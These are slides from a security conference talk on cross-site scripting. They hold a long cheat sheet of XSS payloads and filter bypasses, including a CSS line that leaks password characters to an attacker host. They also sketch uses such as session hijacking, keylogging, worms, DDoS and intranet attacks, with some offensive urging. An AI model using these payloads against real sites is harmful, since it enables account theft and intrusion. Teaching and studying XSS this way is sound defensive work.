XSS is more than a simple threat

Avădănei AndreiSoftware Developer, Blogger, Student

www.worldit.info

@AndreiAvadanei

andrei@worldit.info

#RoCyberCon @20 february

Introduction to XSS

Short story XSS types Shouts

Short story

XSS- it's a client side vulnerability

- … but can become a server side one

- based on Javascript injection

- … and HTML, Java, ActiveX, VBScript, Flash, JSON and so on

- is the second most popular threat in 2010 (via Infosec & OWASP)

- with many resources available on the Internet (use Google)

XSS Types

Non-persistent (reflected)

- the most common type of XSS injection

- requires server side interpretation of the query

- third-party required

Persistent (stored)

- the most dangerous type of XSS injection

- requires server side interpretation of the query and data storing

- third-party may not be required

Dom-based

- the newest type of XSS injection

- requires client side interpretation

- usually non-persistent

Shouts #1 – XSS Amazon

Shouts #2 XSS Facebook

Shouts #3 XSS Google

Shouts #4 XSS Ebay

Shouts #5 More XSS'ed

Twitter, MySpace, Hi5, Wordpress, Yahoo, Joomla, PhpBB, Drupal, e107, WorldIT.info, PHP-Nuke, PHP-Fusion, *.edu, *.gov, NASA, Youtube, Blogspot, Symantec, Kaspersky, NOD32, browser plugins etc. etc. etc. etc.

Getting XSS'ed

Where? Basic XSS'ing Advanced XSS'ing HTML 5 XSS'ed Bypass XSS protection

Where? everywhere

Rule : ”Do not trust in anything ever, especially when it comes to user input.” XSS vulnerabilities can be found in anything that came from user. GET, POST, COOKIE, FILES, SERVER and Headers are main targets. Try to be clever.

Basic XSS'ing

<script>alert(1)</script> //basic

“><script>alert(1)</script> //bypass a open tag

<!--<img src="--><img src=x onerror=alert(1)//"> //bypass & generate a error

“ onmouseover=”alert(1)” //all javascript events

alert(/XSS/.source) or alert( String(/Test/).substr(1,4) ); //some other simple vectors

<script>alert(String.fromCharCode(88,83,83));</script> //bypass quotes filters

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> //unicode injection; utf-8, hex, decimal or octal injection may work

<meta http-equiv="refresh" content="0;url=http://;javascript:..." // evasion

<style type=text/javascript>alert('xss')</style> //javascript injection based on style tag

“><img src=”x:x” onerror=”alert(0)”> // :D

[…]

Advanced XSS'ing

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> //background & unicode

exp/*<A STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'> //send IE into a loop

<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> //xss in xml document

x='\x61\x6c\x65\x72\x74\x28\x31\x29'; new Function(x)(); //something different from every day injections

Function('a\x6cert(1)')();// ;)

x=eval,1,1,1;1; 1,1,1,b='\\',1,1,1; 1,1,1,s='\'',1,1,1;1,1,1,o='0',1,1,1; x( x(s+b+141+b+154+b+145+b+162+b+164+b+o+50+b+o+61+b+o+51+s) ); //eval + unicode injection

[...]

HTML 5 XSS'ed

- new technologies, new problems

<video onerror=”javascript:alert(1)”><source> //new tag

<audio onerror=”javascript:alert(1)”><source> //other new tag

<form id=test onforminput=alert(1)> <input> </form> <button form=test onformchange=alert(2)>X //new events

<div draggable=”true” ondragstart=”event.dataTransfer.setData('text/plain', 'Evil payload')”> <h3>DRAG ME!!</h3> </div> //new functions, events & attributes

<input type="text" AUTOFOCUS onfocus=alert(1)>

<script>alert(localStorage.getItem('foo'))</script> //access local storage

“><script>(history.pushState({},”,'index.php'))(document.forms[0].action='http://maliciousURL')</script> //conceal the real location and replace it with anything we want. Ex : http://bit.ly/pushStateXSS

Bypass XSS protection

<img/src="mars.png"alt="mars"> //no white spaces, use / instead

<object data="javascript:alert(0)"> //avoid src

<isindex type=image src=1 onerror=alert(1)> //did you know isindex tag?

<img src=x:alert(alt) onerror=eval(src) alt=0> //another bypass for error generation

location=location.hash.slice(1); //avoid the #

http://victim.com?param=";location=location.hash)//#0={};alert(0) //payload after the hash url, victim won't see true payload

alert(document.cookie) or alert(document['cookie']) or with(document)alert(cookie) //same results

""+{toString:alert} or ""+{valueOf:alert} //Executes function without using () or =

Future tricks in HTML 5

</a onmousemove="alert(1)"> //html 5 will support events in closed tags

<style>input[name=password][value*=a]{background:url('//attacker?log[]=a');}</style> //pure xss-based XSS

data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg== //avoid using plain text/html value

?injection=<script+&injection=>alert(1)></script> //HPP, popular in SQLi

via BlackHat Conferences.

XSS Injection Exploitation (part 1)

Redirection Clickjacking URL Spoofing Session hijacking Cookie stuffing Ad Hijacking CSRF/XSRF attacks History stealling XSS Defacement Key & Mouse logging

Redirection & Clickjacking

Redirection redirect your victim, ex. document.location = ”http://www.your-evil-

site.com”;

you create fake traffic popularClickjacking describes one websites that poses as another. ex. : redirect victim to you onclick event calling used in phishing, gives high credibility extremely popular

URL Spoofing

popular in phishing the url is user friendly the web page content is hijacked and all

information are send to monitored websites by a thief

extremely popular

Session Hijacking

also known as ”Cookie Stealling” usually used with document.cookie help you to gain control over other logged session needs a cookie grabber for instance, XSS in *.yahoo.com can help you to

hijack Yahoo accounts extremely popular

Cookie stuffing

also known as cookie dropping used in blackhat online marketing generates illegitimate affiliate sellings by

hijacking cookies uses pop-ups, frames and iframes, images,

javascript, stylesheets or flash for accomplishing cookie dropping

popular

Ad Hijacking

used in blackhat online marketing usually requires persistent XSS you can modify ad scripts with your own, getting

paid when user clicks on hijacked ads popular

CSRF/XSRF attacks

unauthorized commands are transmited from an user that website trusts.

usually used along with <img src=””. for instance, if <img src=”http://victim.com/?do=logout” /> is

permanently injected and an user acces the page with malformated content, he will be forced to log out.

use your imagination, you can do more than that.

History Stealling You can find out what sites have been visited by the victim using

”getComputedStyle” like bellow, after you createad a node with CSS visited selector having a custom known color :

document.defaultView.getComputedStyle(link, null).getPropertyValue("color");

rarely used, but still important it could be done using the full power of HTML 5

XSS Defacement

looks like server side defaced pages … but it's only a client side deface can create chaos and confusion when they are

used for hacking an website invoves changing the HTML content of the page of course, two types : persistent and non-

persistent persistent XSS deface are more dangerous than

no-persistent

Key & Mouse Logging

Keylogging - log all keystrokes and send remotely

- document.onkeypress / unsafeWindow.onkeypress events

- store keystrokes on a local variable and send them regular on a remote server

Mouse logging - log all mouse moves and send remotely

- document.onmousemove event

- dangerous but not so popular0

Tired?

You shouldn't, because this is only the beggining...

XSS Injection Exploitation(part 2)

Browser hijacking Port Scanning DDoS XSS Tunneling Distributed Password Cracking Worms (Spreading) Arbitrary file execution & Privilege escalation Intranet Hacking

Browser Hijacking Also known as Tab Hijacking. Highly recommended when hacker want a second shot on victims. XSS Shells usually do for you With iframe injection Working until the victim close the tab. The only drawback with this method is that the URL bar does not change with

each click, which may or may not be noticeable to the user.

Distributed port scanning Cross domain XMLHttpRequests and WebSockets for performing remote port

scanning, but using XSS you can do distributed remote port scanning Latest Firefox, Chrome or Safari supports already these new technolologies This option it's not available yet but it will in the next generation of XSS Shell Firefox & Safari time connection is less than 100 ms 1 victim – 65,000 scanned ports – 6,500 seconds 100 victims - 65,000 scanned ports – 6,5 seconds What about 1,000 or 10,000 victims?

DDoS Based on WebSockets Application-level DDoS attacks (layer 7 DDoS) Cross Origin Request (COR) are processed even if the site has restriction and

therefore the request will create a load on the server 1 minute – 1 browser – 10,000 requests / minute using COR WebWorkers with

GET requests 1 minute – 600 browser – over 100, 000 requests / minute can be enought to

shut down a target We should wait for upgrading the majority of the browsers in the world But blackhat teams will be prepared with amazing tools for DDoS

XSS Tunneling XSS Channel is an interactive communication channel between two systems

which is opened by an XSS attack. At technical level, it may be an Ajax application. Node.js and Comet Push can

make difference in the future XSS Shells. XSS Tunnelling is the tunnelling of HTTP traffic through an XSS Channel to

use virtually any application that supports HTTP proxies. XSS Tunnel is the standard HTTP proxy which sits on an attacker’s system. You can tunnel all your traffic throught a XSS Channel. You can build your own SSH-like protocol. You can forget about the user session problem when hijacking is not possible

because there is an IP adress restriction. Again, your imagination is the limit.

Distributed Password Cracking

Javascript engines are becoming verry fast. And we have WebWorkers. Password guessing rates in Javascript tools of 100,000 MD5 hashes/second. ~100 machines running the JavaScript distributed password cracking

program can match the cracking rate of one machine running a similar program written in native code.

But, in these days spreading methods are verry effective. Why not 10,000 compromised machines?

Ravan - a JavaScript distributed password cracker that uses HTML5 WebWorkers.

Perform password cracking in background JavaScript threads. Support salted MD5 and SHA hashes.

Worms (spreading) One of the most efficient environment for worm propagation - social

networking XSS Warhol Worm Linear XSS Worm Hydra XSS Worm Samy (2005) inffected over 1,000,000 users from MySace in 20 hours Yahoo!, Hi5, Twitter and Facebook could easily be next targets on a larger

scale. You can simply attach a trojan with your Worm and the risks of creating

permanent zombies are growing.

Arbitrary file execution In 2008 a vulnerability which affected the IE 7 & IE 8 could execute some

arbitrary files using some social engineering skills. During last years few other similar vulnerabilities appeard on Internet jungle. Still, a XSS vulnerability and a CSRF vulnerability in a administrator file editor,

which can be bypassed with XMLHttpRequest to the same origin requests an you have the right combination : a XSS vulnerability has become arbitrary code execution (privilege escalation).

What are you waiting for? Find the next one major privilege escalation vulnerability.

Intranet Hacking(part 1)

Web browsers can be completely controlled by any Web page, enabling them to become launching points to attack internal network resources. Why?

Intranet Hacking(part 2)

Exploit procedures : A victim visits a malicious Web page or clicks a nefarious link; embedded

JavaScript malware then assumes control over their Web browser. JavaScript malware loads a Java applet revealing the victim’s internal NAT IP

address. Then, using the victim’s Web browser as an attack platform, the JavaScript

malware identifies and fingerprints Web servers on the internal network. Attacks are initiated against internal or external Web sites, and compromised

information is sent outside the network for collection.

Intranet Hacking(part 3)

Collecting information : Obtaining NAT'ed IP Adress – MyAddress, a special Java Applet

Port scanning - <script src=http://ip/></script>

Blind Web Server Fingerprinting - explore the use of unique image URLs, CSS or JavaScript files to perform fingerprinting.

<img src="http://intranet_ip/unique_image_url" onerror="fingerprint()" />

Attack the intranet

- try different well-known vulnerabilities

- try hacking the web interface of DSL routers

- load local files using file:///

- get help from XSS Shells

Preventing XSS attacks

Filtering Input / Output encoding Web browser security

- select a safer browser (Chrome)- use a virtual machine for suspicious links- pay more attention to shortened urls- use plugins for better security (like NoScript)

XSS it's still a simple threat?

:)

Question?

Thanks. :)

Bibliography

Experience & Google.